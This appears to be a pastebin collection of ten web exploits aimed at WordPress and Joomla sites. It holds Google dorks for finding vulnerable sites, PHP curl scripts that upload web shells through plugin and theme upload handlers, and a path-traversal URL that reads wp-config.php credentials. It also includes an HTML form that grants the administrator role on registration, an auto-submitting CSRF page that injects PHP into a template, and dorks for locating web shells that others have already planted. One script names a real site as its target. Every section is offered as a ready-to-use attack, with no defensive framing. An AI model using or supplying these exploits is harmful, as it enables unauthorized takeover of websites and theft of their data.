10 Latest Exploit [from https://pastebin.com/u/AnonGhots]

1. YH=YH=YH=ANON=Yh=Yh=yH
2. #YassineElHilali
3.  
4. #1.Exploit Title:WordPress Font Uploader Shell Upload
5. Google Dork : inurl:/wp-content/plugins/font-uploader/
6. code===>
7. <?php
8.  
9. $uploadfile="yourshellname.php.ttf";
10. $ch =
11. curl_init("http://www.yourtarget.com/wp-content/plugins/font-uploader/font-upload.php");
12. curl_setopt($ch, CURLOPT_POST, true);
13. curl_setopt($ch, CURLOPT_POSTFIELDS,
14. array('font'=>"@$uploadfile",
15. 'Submit'=>'submit'));
16. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
17. $postResult = curl_exec($ch);
18. curl_close($ch);
19. print "$postResult";
20.  
21. ?>
22. ========================================================
23. #2.Exploit Title:Wordpress plugin Arbitary File Upload All Version
24. Google Dork: inurl:assets/uploadify/ site:.com [use your brain for dorking]
25. ==>after going to your desire site u will find a file/folder [uploadify] u need to click there
26. sample==>http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
27. code==>
28. <?php
29. $uploadfile="yourshell.php";
30.  
31. $ch = curl_init("http://www.abhaya.org/assets/themes/plugins/uploadify/uploadify.php");
32. curl_setopt($ch, CURLOPT_POST, true);
33. curl_setopt($ch, CURLOPT_POSTFIELDS,
34. array('Filedata'=>"@$uploadfile",
35. 'folder'=>'/'));
36. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
37. $postResult = curl_exec($ch);
38. curl_close($ch);
39. print "$postResult";
40.  
41. ?>
42. ==========================================================
43. #3.Exploit Title:Wordpress Atom Themes Arbitary File Upload
44. Google Dork : inurl:"/wp-content/themes/atom/"
45. code==>
46. <?php
47. $uploadfile="yourshell.php";
48.  
49. $ch = curl_init("http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploadify.php");
50. curl_setopt($ch, CURLOPT_POST, true);
51. curl_setopt($ch, CURLOPT_POSTFIELDS,
52. array('Filedata'=>"@$uploadfile",
53. 'folder'=>'/'));
54. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
55. $postResult = curl_exec($ch);
56. curl_close($ch);
57. print "$postResult";
58.  
59. ?>
60.  
61. Shell Access : http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploads/randomnumber[ur shellname].php
62. =============================================================
63. #4.Exploit Title:WordPress theme soulmedic Arbitrary File Download Vulnerability
64. Google Dork:inurl:"/wp-content/themes/soulmedic/"
65. http://www.yourtarget.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
66. ===>u will find database password/name of that server
67. ================================================================
68. #5.Exploit Title:PHP File Upload Vulnerability
69. Google Dork:inurl:images/jupload.php;guest100;guest100
70. http://www.yourtarget.com/images/jupload.php;guest100;guest100 [u need to remove this ;guest100;guest100]
71. http://www.yourtarget.com/images/jupload.php [after removing ;guest100;guest100]
72. if u find uploading option then u can upload your shell
73. shell access==>http://www.yourtarget.com/images/shell.php
74. ==================================================================
75. #6.Exploit Title:Hades+ Framework Add Administrator
76. Google multiple Dork: inurl:/wp-content/themes/appius/
77. inurl:/wp-content/themes/Consultant/
78. inurl:/wp-content/themes/appius1/
79. inurl:/wp-content/themes/archin/
80. inurl:/wp-content/themes/averin/
81. inurl:/wp-content/themes/dagda/
82. inurl:/wp-content/themes/echea/
83. inurl:/wp-content/themes/felici/
84. inurl:/wp-content/themes/kmp/
85. inurl:/wp-content/themes/kmp2/
86. inurl:/wp-content/themes/liberal/
87. inurl:/wp-content/themes/liberal-media-bias/
88. inurl:/wp-content/themes/linguini/
89. inurl:/wp-content/themes/livewire/
90. inurl:/wp-content/themes/majestics/
91. inurl:/wp-content/themes/mathis/
92. inurl:/wp-content/themes/mazine/
93. inurl:/wp-content/themes/Orchestra/
94. inurl:/wp-content/themes/shopsum/
95. inurl:/wp-content/themes/shotzz/
96. inurl:/wp-content/themes/test/
97. inurl:/wp-content/themes/Viteeo/
98. inurl:/wp-content/themes/vithy/
99. inurl:/wp-content/themes/yvora/
100. inurl:/wp-content/themes/sodales/
101. Exploit:
102. <form action="http://www.yourtarget.com/wp-content/themes/[themename,i mean:/appius//Consultant//archin/etc etc]/hades_framework/option_panel/ajax.php" method="POST">
103. <input name="values[0][name]" value="users_can_register">
104. <input name="values[0][value]" value="1">
105. <input name="values[1][name]" value="admin_email">
106. <input name="values[1][value]" value="{%YOUR_EMAIL}">
107. <input name="values[2][name]" value="default_role">
108. <input name="values[2][value]" value="administrator">
109. <input name="action" value="save">
110. <input type="submit" value="Submit">
111. </form>
112. Process==>
113. 1.Change [themename,i mean:/appius//Consultant//archin/etc etc]vulnerable theme, [YOUR_EMAIL] with your email address.
114. sample==>http://www.yourtarget.com/wp-content/themes/[replace the vulnerable themename with yourmailaddress]/hades_framework/option_panel/ajax.php
115. 2. go to http://www.yourtarget.com/wp-login.php?action=register, [you will see the registration form].
116. 3. choose your username & email address and register.
117. 4. go to your email, you will find your password.
118. 5. then login & and upload your shell
119. ===============================================================
120. #7.Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
121. Google Dork: inurl:/wp-content/themes/dandelion/
122. Code==>
123. <?php
124. $uploadfile="yourshell.php";
125. $ch = curl_init("http://www.yourshell.com/wp-content/themes/dandelion/functions/upload-handler.php");
126. curl_setopt($ch, CURLOPT_POST, true);
127. curl_setopt($ch, CURLOPT_POSTFIELDS,
128. array('Filedata'=>"@$uploadfile"));
129. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
130. $postResult = curl_exec($ch);
131. curl_close($ch);
132. print "$postResult";
133. ?>
134. shell link=> http://www.yourshell.com/uploads/[years]/[month]/your_shell.php
135. =====================================================================
136. #8.Exploit Title: Wordpress satoshi Themes Arbitry File Upload
137. Google Dork: inurl:/wp-content/satoshi/dandelion/
138. Code==>
139. <?php
140. $uploadfile="yourshell.php";
141. $ch = curl_init("http://www.yourshell.com/wp-content/themes/satoshi/functions/upload-handler.php");
142. curl_setopt($ch, CURLOPT_POST, true);
143. curl_setopt($ch, CURLOPT_POSTFIELDS,
144. array('Filedata'=>"@$uploadfile"));
145. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
146. $postResult = curl_exec($ch);
147. curl_close($ch);
148. print "$postResult";
149. ?>
150. ========================================================================
151. #8.Exploit Title:Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
152. <?php
153. /**
154. * Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
155. * 3 October 2010
156. * jdc
157. *
158. * How it works - admin template form has no nonce
159. * How to exploit - get a logged in admin to click the wrong link ;)
160. * Patched in 2.1.7
161. */
162. // change these
163. $target = 'http://localhost/joomla';
164. $exploit = '<?php echo phpinfo(); ?>';
165. /* page - any one of:
166. page_addCategory
167. page_addListing
168. page_advSearchRedirect
169. page_advSearchResults
170. page_advSearch
171. page_claim
172. page_confirmDelete
173. page_contactOwner
174. page_errorListing
175. page_error
176. page_gallery
177. page_image
178. page_index
179. page_listAlpha
180. page_listing
181. page_listListings
182. page_ownerListing
183. page_print
184. page_recommend
185. page_replyReview
186. page_reportReview
187. page_report
188. page_searchByResults
189. page_searchResults
190. page_subCatIndex
191. page_usersFavourites
192. page_usersReview
193. page_writeReview
194. sub_alphaIndex
195. sub_images
196. sub_listingDetails
197. sub_listings
198. sub_listingSummary
199. sub_map
200. sub_reviews
201. sub_subCats
202. */
203. $page = 'page_print';
204. // don't change these
205. $path = '/administrator/index.php';
206. $data = array(
207. 'pagecontent' => $exploit,
208. 'template' => 'm2',
209. 'option' => 'com_mtree',
210. 'task' => 'save_templatepage',
211. 'page' => $page
212. );
213. ?>
214. <html>
215. <body>
216. <?php if (@$_GET['iframe']) : ?>
217. <form id="csrf" action="<?php echo $target.$path; ?>" method="post">
218. <?php foreach ($data as $k => $v) : ?>
219. <input type="text" value="<?php echo htmlspecialchars($v); ?>"
220. name="<?php echo $k; ?>" />
221. <?php endforeach; ?>
222. <script type="text/javascript">
223. document.forms[0].submit();
224. </script>
225. </form>
226. <?php else : ?>
227. <h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
228. <p>If you were logged in as admin, you just got owned!</p>
229. <div style="display:none">
230. <iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
231. </div>
232. <?php endif; ?>
233. </body>
234. </html>
235. #9.Exploit Title:wordpress potential themes vuln upload
236. 1.dork: inurl:/wp-content/themes/nuance/
237. exploit: /functions/jwpanel/scripts/valums_uploader/php.php
238.  
239. 2. dork: inurl:/wp-content/themes/lightspeed/
240. exploit: /framework/_scripts/valums_uploader/php.php
241.  
242. 3. dork: inurl:/wp-content/themes/saico/
243. exploit: /framework/_scripts/valums_uploader/php.php
244.  
245. 4. dork: inurl:/wp-content/themes/eptonic/
246. exploit: /functions/jwpanel/scripts/valums_uploader/php.php
247.  
248. 5. dork: inurl:/wp-content/themes/skinizer/
249. exploit: /framework/_scripts/valums_uploader/php.php
250.  
251. 6. dork: inurl:/wp-content/themes/area53/
252. exploit: /framework/_scripts/valums_uploader/php.php
253.  
254. 7. dork: inurl:/wp-content/themes/blinc/
255. exploit:/framework/_scripts/valums_uploader/php.php
256.  
257. csrf from html:
258.  
259. <form enctype="multipart/form-data"
260. action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
261. <input type="jpg" name="url" value="./" /><br />
262. Please choose a file: <input name="qqfile" type="file" /><br />
263. <input type="submit" value="upload" />
264. </form>
265. it the url allows you to upload your shell then u can upload it or if it says any #Error then find another one
266. shell link==>
267. http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php
268. http://www.yourtarget.com/wp-content/uploads/shell.php
269. #10.Exploit Title:For Noob[Dorking shell]
270. b374k m1n1
271. Quote:
272. google dork :
273. intitle:b374k m1n1 inurl:wp-content
274. intitle:"index of /" "b374k.php"
275.  
276.  
277. Dorking shell wso
278. Quote:
279. google dork :
280. intitle:"Index of /uploads" "wso.php"
281. intitle:"index of /" "wso.php"
282.  
283.  
284. Dorking Shell Madspot
285. Shell ini defaultnya tidak dipassword dan terindex google sehingga kita bisa dorking untuk menemukan shell ini.
286. Quote:
287. google dork :
288. intitle:Madspot Security site:com
289.  
290.  
291. Dorking Shell 1n73ct10n
292. Quote:
293. google dork :
294. intitle:1n73ct10n inurl:wp-content
295. intitle:"index of /" "1n73ct10n.php"]
296. ###########################################################################################
297. and u can find many tut on google for JCE/Revslider/Com_user/comfabrik/webdav/Jdownload
298. But if u r a Pro in CMS/backendweb developer then u can make your own exploit for Joomla/wordpress/Drupal/woocommerce etc etc,but u need to know very clear idea of web apps/web apps development
299. website is a huge thing[plugin/theme/component/widget/framework:joomla,wordpress,drupal,Bootstrap,phpBB,etc etc many high profile backend developer will reward you]